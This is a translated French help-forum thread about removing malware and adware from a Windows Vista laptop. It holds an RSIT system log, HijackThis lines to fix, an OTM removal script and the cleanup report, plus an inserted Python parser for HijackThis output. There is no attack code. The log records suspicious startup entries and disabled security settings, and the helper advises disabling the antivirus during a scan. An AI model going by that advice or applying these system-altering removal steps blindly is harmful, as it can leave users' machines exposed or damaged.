[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\32868532]
C:\ProgramData\32868532\32868532.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BitComet]
C:\Program Files\BitComet\BitComet.exe /tray []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Sony Ericsson PC Suite]
C:\Program Files\Sony Ericsson\Mobile2\Application Launcher\Application Launcher.exe /startoptions []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\sysgif32]
C:\Users\maman\AppData\Local\Temp\~TM50A7.tmp []

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
HP Digital Imaging Monitor.lnk - C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
Philips Gestionnaire de périphériques.lnk - C:\Program Files\Philips\SA28XX Device Manager\main.exe

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfPf]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfRd]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfSvc]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfUsbccidDriver]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"LogonHoursAction"=2
"DontDisplayLogonHoursWarnings"=1

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
"EnableUIADesktopToggle"=0

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=255
"NoDriveAutoRun"=255
"HonorAutoRunSetting"=0

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"BindDirectlyToPropertySetStorage"=
"NoDriveAutoRun"=
"NoDriveTypeAutoRun"=
"HonorAutoRunSetting"=

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]

======File associations======

.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*
.txt - open - C:\Windows\notepad.exe %1

======List of files/folders created in the last 1 months======

2010-02-20 23:17:36 ----RASHD---- C:\autorun.inf
2010-02-20 23:12:34 ----A---- C:\UsbFix.txt
2010-02-20 23:01:12 ----D---- C:\UsbFix
2010-02-20 20:47:06 ----D---- C:\Users\maman\AppData\Roaming\Malwarebytes
2010-02-20 20:47:01 ----D---- C:\ProgramData\Malwarebytes
2010-02-20 20:46:59 ----D---- C:\Program Files\Malwarebytes' Anti-Malware
2010-02-20 20:26:00 ----D---- C:\Program Files\trend micro
2010-02-20 20:25:59 ----D---- C:\rsit
2010-02-11 13:03:38 ----A---- C:\Windows\system32\tsbyuv.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\quartz.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\msyuv.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\msvidc32.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\msrle32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\msvfw32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\mciavi32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\iyuv_32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\avifil32.dll
2010-02-10 21:14:37 ----D---- C:\ProgramData\BVRP Software
2010-02-10 21:11:04 ----A---- C:\ProgramData\hpeA6B.dll
2010-02-10 21:10:37 ----D---- C:\ProgramData\Sony Ericsson
2010-01-24 14:24:34 ----A---- C:\Windows\system32\aswBoot.exe
2010-01-24 11:31:29 ----A---- C:\Windows\wininit.ini
2010-01-24 11:05:34 ----D---- C:\ProgramData\Spybot - Search & Destroy
2010-01-24 11:05:34 ----D---- C:\Program Files\Spybot - Search & Destroy
2010-01-24 10:39:25 ----A---- C:\Windows\system32\mshtml.dll
2010-01-24 10:39:24 ----A---- C:\Windows\system32\ieframe.dll
2010-01-24 10:39:23 ----A---- C:\Windows\system32\wininet.dll
2010-01-24 10:39:23 ----A---- C:\Windows\system32\urlmon.dll
2010-01-24 10:39:23 ----A---- C:\Windows\system32\iertutil.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\occache.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\msfeedsbs.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\msfeeds.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\jsproxy.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\ieUnatt.exe
2010-01-24 10:39:22 ----A---- C:\Windows\system32\ieui.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\iesysprep.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\iepeers.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\iedkcs32.dll
2010-01-24 10:39:17 ----A---- C:\Windows\system32\msfeedssync.exe
2010-01-24 10:39:17 ----A---- C:\Windows\system32\iesetup.dll
2010-01-24 10:39:17 ----A---- C:\Windows\system32\iernonce.dll
2010-01-24 10:39:17 ----A---- C:\Windows\system32\ie4uinit.exe
2010-01-23 22:39:44 ----D---- C:\ProgramData\Alwil Software
2010-01-23 16:56:16 ----A---- C:\Windows\ntbtlog.txt
2010-01-23 08:39:56 ----D---- C:\Users\maman\AppData\Roaming\HpUpdate
2010-01-23 08:39:53 ----D---- C:\Windows\Hewlett-Packard

======List of files/folders modified in the last 1 months======

2010-02-21 00:59:55 ----D---- C:\Windows\Temp
2010-02-20 23:28:47 ----D---- C:\Windows\Prefetch
2010-02-20 23:18:39 ----D---- C:\Program Files\Mozilla Firefox
2010-02-20 23:16:28 ----SHD---- C:\$RECYCLE.BIN
2010-02-20 23:12:30 ----D---- C:\Windows\SMINST
2010-02-20 22:48:38 ----A---- C:\Windows\NeroDigital.ini
2010-02-20 22:35:27 ----D---- C:\Users\maman\AppData\Roaming\Skype
2010-02-20 22:34:55 ----D---- C:\Users\maman\AppData\Roaming\skypePM
2010-02-20 22:33:27 ----D---- C:\Windows\system32\drivers
2010-02-20 22:33:27 ----D---- C:\Windows\SchCache
2010-02-20 22:31:01 ----HD---- C:\ProgramData
2010-02-20 21:56:54 ----D---- C:\Users\maman\AppData\Roaming\FileZilla
2010-02-20 20:46:59 ----RD---- C:\Program Files
2010-02-20 11:58:32 ----SHD---- C:\System Volume Information
2010-02-20 11:49:06 ----D---- C:\ProgramData\Skyline
2010-02-20 11:35:48 ----SHD---- C:\Windows\Installer
2010-02-20 11:35:43 ----D---- C:\ProgramData\Microsoft Help
2010-02-18 18:32:08 ----D---- C:\Windows
2010-02-16 16:20:22 ----D---- C:\Windows\System32
2010-02-16 16:20:22 ----D---- C:\Windows\inf
2010-02-16 16:20:22 ----A---- C:\Windows\system32\PerfStringBackup.INI
2010-02-13 13:53:55 ----D---- C:\Windows\system32\catroot2
2010-02-11 20:20:35 ----D---- C:\Windows\winsxs
2010-02-11 20:10:25 ----D---- C:\Windows\system32\catroot
2010-02-11 20:06:25 ----D---- C:\Program Files\Windows Mail
2010-02-10 21:10:37 ----HD---- C:\Program Files\InstallShield Installation Information
2010-02-10 21:10:37 ----D---- C:\Program Files\Sony Ericsson
2010-02-01 20:26:20 ----A---- C:\Windows\system32\mrt.exe
2010-01-31 11:48:33 ----D---- C:\Windows\Tasks
2010-01-31 11:48:33 ----D---- C:\Windows\system32\Tasks
2010-01-27 20:51:18 ----D---- C:\Program Files\Internet Explorer
2010-01-24 14:25:00 ----D---- C:\Program Files\Common Files\microsoft shared
2010-01-24 14:00:28 ----D---- C:\Users\maman\AppData\Roaming\Teleca
2010-01-24 14:00:24 ----D---- C:\Windows\Downloaded Installations
2010-01-24 14:00:11 ----D---- C:\Program Files\Common Files\Teleca Shared
2010-01-24 14:00:07 ----D---- C:\Program Files\Common Files
2010-01-24 13:54:46 ----D---- C:\Windows\system32\migration
2010-01-23 22:41:00 ----D---- C:\Program Files\Alwil Software

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R1 aswRdr;aswRdr; C:\Windows\system32\drivers\aswRdr.sys [2010-02-11 23376]
R1 aswSP;aswSP; C:\Windows\system32\drivers\aswSP.sys [2010-02-11 162512]
R1 aswTdi;avast! Network Shield Support; C:\Windows\system32\drivers\aswTdi.sys [2010-02-11 46672]
R1 eabfiltr;eabfiltr; C:\Windows\system32\DRIVERS\eabfiltr.sys [2006-11-30 8192]
R1 IDSvix86;Symantec Intrusion Prevention Driver; \??\C:\PROGRA~2\Symantec\DEFINI~1\SymcData\idsdefs\20080215.002\IDSvix86.sys [2008-02-13 261680]
R1 kl1;kl1; C:\Windows\system32\DRIVERS\kl1.sys [2007-10-31 110096]
R1 SRTSPX;SRTSPX; C:\Windows\System32\Drivers\SRTSPX.SYS [2007-11-30 43696]
R1 SYMTDI;SYMTDI; C:\Windows\System32\Drivers\SYMTDI.SYS [2007-10-30 191536]
R2 aswFsBlk;aswFsBlk; C:\Windows\system32\drivers\aswFsBlk.sys [2010-02-11 19024]
R2 aswMonFlt;aswMonFlt; \??\C:\Windows\system32\drivers\aswMonFlt.sys [2010-02-11 51792]
R2 mdmxsdk;mdmxsdk; C:\Windows\system32\DRIVERS\mdmxsdk.sys [2006-06-19 12672]
R2 rimmptsk;rimmptsk; C:\Windows\system32\DRIVERS\rimmptsk.sys [2007-02-24 39936]
R2 rimsptsk;rimsptsk; C:\Windows\system32\DRIVERS\rimsptsk.sys [2007-01-23 42496]
R2 rismxdp;Ricoh xD-Picture Card Driver; C:\Windows\system32\DRIVERS\rixdptsk.sys [2007-01-23 37376]
R2 XAudio;XAudio; C:\Windows\system32\DRIVERS\xaudio.sys [2006-11-28 8192]
R3 BCM43XX;Pilote pour carte réseau Broadcom 802.11; C:\Windows\system32\DRIVERS\bcmwl6.sys [2007-01-03 534016]
R3 CmBatt;Pilote pour Batterie à méthode de contrôle ACPI Microsoft; C:\Windows\system32\DRIVERS\CmBatt.sys [2008-01-19 14208]
R3 CnxtHdAudService;Conexant UAA Function Driver for High Definition Audio Service; C:\Windows\system32\drivers\CHDRT32.sys [2008-03-03 188416]
R3 HBtnKey;HBtnKey; C:\Windows\system32\DRIVERS\cpqbttn.sys [2006-06-28 9472]
R3 HSF_DPV;HSF_DPV; C:\Windows\system32\DRIVERS\HSX_DPV.sys [2006-12-07 985600]
R3 HSXHWAZL;HSXHWAZL; C:\Windows\system32\DRIVERS\HSXHWAZL.sys [2006-12-07 207360]
R3 NVENETFD;NVIDIA nForce Networking Controller Driver; C:\Windows\system32\DRIVERS\nvmfdx32.sys [2007-03-07 1059112]
R3 nvlddmkm;nvlddmkm; C:\Windows\system32\DRIVERS\nvlddmkm.sys [2007-09-19 7626400]
R3 nvsmu;nvsmu; C:\Windows\system32\DRIVERS\nvsmu.sys [2007-02-17 12032]
R3 sdbus;sdbus; C:\Windows\system32\DRIVERS\sdbus.sys [2009-04-11 89088]
R3 SymEvent;SymEvent; \??\C:\Windows\system32\Drivers\SYMEVENT.SYS [2007-12-22 123952]
R3 SynTP;Synaptics TouchPad Driver; C:\Windows\system32\DRIVERS\SynTP.sys [2007-01-13 181432]
R3 usbvideo;Périphérique vidéo USB (WDM); C:\Windows\System32\Drivers\usbvideo.sys [2008-01-19 134016]
R3 winachsf;winachsf; C:\Windows\system32\DRIVERS\HSX_CNXT.sys [2006-12-07 659968]
R3 WmiAcpi;Microsoft Windows Management Interface for ACPI; C:\Windows\system32\DRIVERS\wmiacpi.sys [2008-01-19 11264]
R3 WUDFRd;WUDFRd; C:\Windows\system32\DRIVERS\WUDFRd.sys [2008-01-19 83328]
S3 BCM43XV;Pilote de la carte réseau extensible Broadcom 802.11; C:\Windows\system32\DRIVERS\bcmwl6.sys [2007-01-03 534016]
S3 Dot4;Pilote MS IEEE-1284.4; C:\Windows\system32\DRIVERS\Dot4.sys [2008-01-19 131584]
S3 Dot4Print;Pilote de classe Imprimante pour IEEE-1284.4; C:\Windows\system32\DRIVERS\Dot4Prt.sys [2008-01-19 16384]
S3 dot4usb;MS Dot4USB Filter Dot4USB Filter; C:\Windows\system32\DRIVERS\dot4usb.sys [2008-01-19 36864]
S3 drmkaud;Filtre de décodeur DRM (Noyau Microsoft); C:\Windows\system32\drivers\drmkaud.sys [2008-01-19 5632]
S3 E100B;Pilote de carte Intel (R) PRO; C:\Windows\system32\DRIVERS\e100b325.sys [2006-11-02 163328]
S3 HdAudAddService;Microsoft UAA Function Driver for High Definition Audio Service; C:\Windows\system32\drivers\CHDART.sys [2007-04-12 160768]
S3 HSFHWAZL;HSFHWAZL; C:\Windows\system32\DRIVERS\VSTAZL3.SYS [2006-11-02 200704]
S3 ialm;ialm; C:\Windows\system32\DRIVERS\igdkmd32.sys [2006-10-19 1380864]
S3 MSKSSRV;Proxy de service de répartition Microsoft; C:\Windows\system32\drivers\MSKSSRV.sys [2008-01-19 8192]
S3 MSPCLOCK;Proxy d'horloge de répartition Microsoft; C:\Windows\system32\drivers\MSPCLOCK.sys [2008-01-19 5888]
S3 MSPQM;Proxy de gestion de qualité de répartition Microsoft; C:\Windows\system32\drivers\MSPQM.sys [2008-01-19 5504]
S3 MSTEE;Convertisseur en T/site-à-site de répartition Microsoft; C:\Windows\system32\drivers\MSTEE.sys [2008-01-19 6016]
S3 NAVENG;NAVENG; \??\C:\PROGRA~2\Symantec\DEFINI~1\VIRUSD~1\20080217.003\NAVENG.SYS [2008-01-21 82256]
S3 NAVEX15;NAVEX15; \??\C:\PROGRA~2\Symantec\DEFINI~1\VIRUSD~1\20080217.003\NAVEX15.SYS [2008-01-21 895312]
S3 s816bus;Sony Ericsson Device 816 driver (WDM); C:\Windows\system32\DRIVERS\s816bus.sys [2007-06-19 81832]
S3 s816mdfl;Sony Ericsson Device 816 USB WMC Modem Filter; C:\Windows\system32\DRIVERS\s816mdfl.sys [2007-06-19 13864]
S3 s816mdm;Sony Ericsson Device 816 USB WMC Modem Driver; C:\Windows\system32\DRIVERS\s816mdm.sys [2007-06-19 107304]
S3 s816mgmt;Sony Ericsson Device 816 USB WMC Device Management Drivers (WDM); C:\Windows\system32\DRIVERS\s816mgmt.sys [2007-06-19 99112]
S3 s816nd5;Sony Ericsson Device 816 USB Ethernet Emulation SEMCMR7 (NDIS); C:\Windows\system32\DRIVERS\s816nd5.sys [2007-06-19 21928]
S3 s816obex;Sony Ericsson Device 816 USB WMC OBEX Interface; C:\Windows\system32\DRIVERS\s816obex.sys [2007-06-19 97320]
S3 s816unic;Sony Ericsson Device 816 USB Ethernet Emulation SEMCMR7 (WDM); C:\Windows\system32\DRIVERS\s816unic.sys [2007-06-19 97704]
S3 SRTSP;SRTSP; C:\Windows\System32\Drivers\SRTSP.SYS [2007-11-30 279088]
S3 SRTSPL;SRTSPL; C:\Windows\System32\Drivers\SRTSPL.SYS [2007-11-30 317616]
S3 SYMDNS;SYMDNS; C:\Windows\System32\Drivers\SYMDNS.SYS [2007-10-30 12848]
S3 SYMFW;SYMFW; C:\Windows\System32\Drivers\SYMFW.SYS [2007-10-30 145968]
S3 SYMIDS;SYMIDS; C:\Windows\System32\Drivers\SYMIDS.SYS [2007-10-30 39856]
S3 SYMNDISV;SYMNDISV; C:\Windows\System32\Drivers\SYMNDISV.SYS [2007-10-30 37936]
S3 SYMREDRV;SYMREDRV; C:\Windows\System32\Drivers\SYMREDRV.SYS [2007-10-30 27696]
S3 usb_rndisx;Carte RNDIS USB; C:\Windows\system32\DRIVERS\usb8023x.sys [2009-04-11 15872]
S3 usbscan;Pilote de scanneur USB; C:\Windows\system32\DRIVERS\usbscan.sys [2008-01-19 35328]
S3 WpdUsb;WpdUsb; C:\Windows\system32\DRIVERS\wpdusb.sys [2009-10-01 40448]

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 avast! Antivirus;avast! Antivirus; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-02-11 40384]
R2 HP Health Check Service;HP Health Check Service; c:\Program Files\Hewlett-Packard\HP Health Check\hphc_service.exe [2008-06-16 94208]
R2 hpqddsvc;Service HP CUE DeviceDiscovery; C:\Windows\system32\svchost.exe [2008-01-19 21504]
R2 hpqwmiex;hpqwmiex; C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe [2006-05-02 135168]
R2 LightScribeService;LightScribeService Direct Disc Labeling Service; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [2007-04-19 75304]
R2 Net Driver HPZ12;Net Driver HPZ12; C:\Windows\System32\svchost.exe [2008-01-19 21504]
R2 OMSI download service;Sony Ericsson OMSI download service; C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SupServ.exe [2009-04-30 90112]
R2 Pml Driver HPZ12;Pml Driver HPZ12; C:\Windows\System32\svchost.exe [2008-01-19 21504]
R2 RapiMgr;@%windir%\WindowsMobile\rapimgr.dll,-104; C:\Windows\system32\svchost.exe [2008-01-19 21504]
R2 SBSDWSCService;SBSD Security Center Service; C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe [2009-01-26 1153368]
R2 WcesComm;@%windir%\WindowsMobile\wcescomm.dll,-40079; C:\Windows\system32\svchost.exe [2008-01-19 21504]
R2 XAudioService;XAudioService; C:\Windows\system32\DRIVERS\xaudio.exe [2006-11-28 386560]
R3 avast! Mail Scanner;avast! Mail Scanner; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-02-11 40384]
R3 avast! Web Scanner;avast! Web Scanner; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-02-11 40384]
R3 hpqcxs08;hpqcxs08; C:\Windows\system32\svchost.exe [2008-01-19 21504]
S2 SymAppCore;Symantec AppCore Service; c:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe []
S3 Com4Qlb;Com4Qlb; C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4Qlb.exe [2007-01-09 110592]
S3 FontCache;@%systemroot%\system32\FntCache.dll,-100; C:\Windows\system32\svchost.exe [2008-01-19 21504]
S3 getPlusHelper;@C:\Program Files\NOS\bin\getPlus_Helper.dll,-101; C:\Windows\System32\svchost.exe [2008-01-19 21504]
S3 gusvc;Google Updater Service; C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe [2008-11-20 136120]
S3 IDriverT;InstallDriver Table Manager; C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [2004-10-22 73728]
S3 odserv;Microsoft Office Diagnostics Service; C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE [2008-11-04 441712]
S3 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184]
S3 RoxMediaDB9;RoxMediaDB9; C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe [2007-02-12 880640]
S3 stllssvr;stllssvr; C:\Program Files\Common Files\SureThing Shared\stllssvr.exe [2007-02-17 74656]
S3 usnjsvc;Service Messenger Sharing Folders USN Journal Reader; C:\Program Files\Windows Live\Messenger\usnsvc.exe [2007-10-18 98328]
S4 CLCapSvc;CyberLink Background Capture Service (CBCS); C:\Program Files\HP\QuickPlay\Kernel\TV\CLCapSvc.exe [2007-04-23 262243]
S4 CLSched;CyberLink Task Scheduler (CTS); C:\Program Files\HP\QuickPlay\Kernel\TV\CLSched.exe [2007-04-23 106593]

-----------------EOF-----------------

philae
 Posted on 21/02/2010 at 14:53
Grande Maîtresse astucienne

Hello,

* run HijackThis with "do a system scan only", then tick these lines:

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=FR_FR&c=73&bd=Pavilion&pf=laptop
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896

O2 - BHO: EoRezoBHO - {64F56FC1-1272-44CD-BA6E-39723696E350} - C:\PROGRA~1\EoRezo\EoAdv\EOREZO~1.DLL (file missing)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)

O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"

O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE RÉSEAU')

O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll

* click FIX CHECKED

then

  • Download OTM (by Old_Timer) to your desktop,
  • Double-click OTM.exe to launch the program,
  • Copy the list of files or folders below and paste it into the program window "Paste Instructions for Items to be Moved":

Begin copying here:

:Files
C:\ProgramData\32868532\32868532.exe
c:\program files\eorezo

:Commands
[emptytemp]
[reboot]

  • Click MoveIt! to start the removal,
  • The result will appear in the Results pane.
  • Click Exit to close the program.
  • Post the report, which is located here: C:\_OTM\MovedFiles
  • You may be asked to restart your PC. If so, click Yes.

* run a scan with IE here:

http://www.kaspersky.com/kos/eng/partner/default/pages/default/check.html?n=1259235770640

* disable your antivirus for the duration of the scan

then post the report
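
Added example, not part of philae's post and not HijackThis code: a small Python parser for the kinds of HijackThis lines listed above (R1, O2, O4, O9) that flags the entries HijackThis itself marks as pointing to a missing file. The function and field names are hypothetical; the sample lines are copied from the post.

```python
import re

# Sample lines copied from the HijackThis selection in the post above.
SAMPLE = r"""
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
O2 - BHO: EoRezoBHO - {64F56FC1-1272-44CD-BA6E-39723696E350} - C:\PROGRA~1\EoRezo\EoAdv\EOREZO~1.DLL (file missing)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE LOCAL')
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll
"""

# "<section code> - <rest>", e.g. "O2 - BHO: ..."
LINE_RE = re.compile(r"^(?P<code>[A-Z]\d{1,2}) - (?P<rest>.+)$")
# O2/O9 entries: "<kind>: <label> - {CLSID} - <target>"
CLSID_RE = re.compile(
    r"^(?P<kind>[^:]+): (?P<label>.*?) - "
    r"(?P<clsid>\{[0-9A-Fa-f-]{36}\}) - (?P<target>.*)$"
)
# O4 entries: "<hive>: [<name>] <command>" with an optional "(User '...')" suffix
RUN_RE = re.compile(
    r"^(?P<hive>.+?): \[(?P<name>[^\]]+)\] (?P<command>.*?)"
    r"(?: \(User '(?P<user>[^']+)'\))?$"
)
# Markers shown in the lines above when the referenced file is absent.
MISSING_RE = re.compile(r"\s*\((?:file missing|no file)\)$")


def parse_line(line):
    """Parse one HijackThis line into a dict, or return None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    code, rest = m["code"], m["rest"]
    entry = {"code": code, "raw": rest, "missing": False}
    if code.startswith("R"):
        # Registry value: "<key>,<value name> = <data>"
        location, _, data = rest.partition(" = ")
        key, _, name = location.rpartition(",")
        entry.update(key=key, name=name, value=data)
    elif code in ("O2", "O9"):
        c = CLSID_RE.match(rest)
        if c:
            target = c["target"]
            entry.update(
                kind=c["kind"], label=c["label"], clsid=c["clsid"],
                # Path without the marker; None when there is no file at all.
                path=MISSING_RE.sub("", target) or None,
                missing=bool(MISSING_RE.search(target)),
            )
    elif code == "O4":
        r = RUN_RE.match(rest)
        if r:
            entry.update(hive=r["hive"], name=r["name"],
                         command=r["command"], user=r["user"])
    return entry


def parse_log(text):
    """Parse every recognisable HijackThis line in a block of text."""
    return [e for e in map(parse_line, text.splitlines()) if e]


def missing_targets(entries):
    """Entries whose registered DLL is gone: leftovers of a removed program."""
    return [e for e in entries if e["missing"]]


if __name__ == "__main__":
    for e in missing_targets(parse_log(SAMPLE)):
        print(e["code"], e["clsid"], e["label"], "->", e["path"])
```
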

chimere06200
 Posted on 21/02/2010 at 16:41
Petite astucienne

Hello,

Here is the report after the scan. Thank you.

All processes killed
Error: Unable to interpret <Begin copying here:> in the current context!
========== FILES ==========
File/Folder C:\ProgramData\32868532\32868532.exe not found.
c:\program files\EoRezo\EoAdv\tmp folder moved successfully.
c:\program files\EoRezo\EoAdv folder moved successfully.
c:\program files\EoRezo folder moved successfully.
========== COMMANDS ==========

[EMPTYTEMP]

User: All Users

User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes

User: Invité
->Temp folder emptied: 12609470 bytes
->Temporary Internet Files folder emptied: 29278246 bytes
->FireFox cache emptied: 14004158 bytes

User: maman
->Temp folder emptied: 1913 bytes
->Temporary Internet Files folder emptied: 82957231 bytes
->Java cache emptied: 522719 bytes
->FireFox cache emptied: 54641016 bytes
->Google Chrome cache emptied: 6053089 bytes

User: postgres

User: postgres0

User: Public

User: tinypgsvc

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 300116 bytes
%systemroot%\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 36386 bytes
RecycleBin emptied: 0 bytes

Total Files Cleaned = 191,00 mb


OTM by OldTimer - Version 3.1.9.0 log created on 02212010_155944

Files moved on Reboot...
File C:\Windows\temp\_avast5_\Webshlock.txt not found!

Registry entries deleted on Reboot...

philae
 Posted on 21/02/2010 at 16:45
Grande Maîtresse astucienne

OK

you can move on to the next step I gave earlier, the online scan

See you later

chimere06200
 Posted on 21/02/2010 at 17:05
Petite astucienne

The program is starting. Please wait...
Updates source is selected: http://www.kaspersky.com
File download: packages/kos-extras.jar
The program is started.

Updating the anti-virus database. Please wait...
Updates source is selected: http://downloads1.kaspersky-labs.com/
Update completed. The program is ready to scan your computer.

chimere06200
 Posted on 21/02/2010 at 19:56
Petite astucienne

Good evening,

Is this the report you meant? I restarted the PC after the scan.

See you

chimere06200
 Posted on 21/02/2010 at 20:34
Petite astucienne

RE

While waiting for the problem to be resolved, could you tell me how to temporarily take my site offline? I am afraid of infecting visitors, because we are in the middle of the booking period, with a lot of traffic, and I would rather avoid that.

Thanks again.

chimere06200
 Posted on 21/02/2010 at 20:52
Petite astucienne

Is anyone there?

philae
 Posted on 21/02/2010 at 22:31
Grande Maîtresse astucienne

No, not at all; that is the database being loaded. After that you have to run the online scan.

To take your site offline, simply remove the main page from the server.

philae
 Posted on 21/02/2010 at 22:32
Grande Maîtresse astucienne

In fact, it says:

The program is ready to scan your computer.

That is, the program is ready to scan the computer. If you restarted it, then it has not scanned it, and you have to start all over again.


cheval de troie pour cameyo
Cheval de Troie : Generic_s.ABP
question sur cheval de troie
cheval de troie
cheval de troie a l'ouverture IE
Plus de sujets relatifs à cheval de troie
 > Tous les forums > Forum Sécurité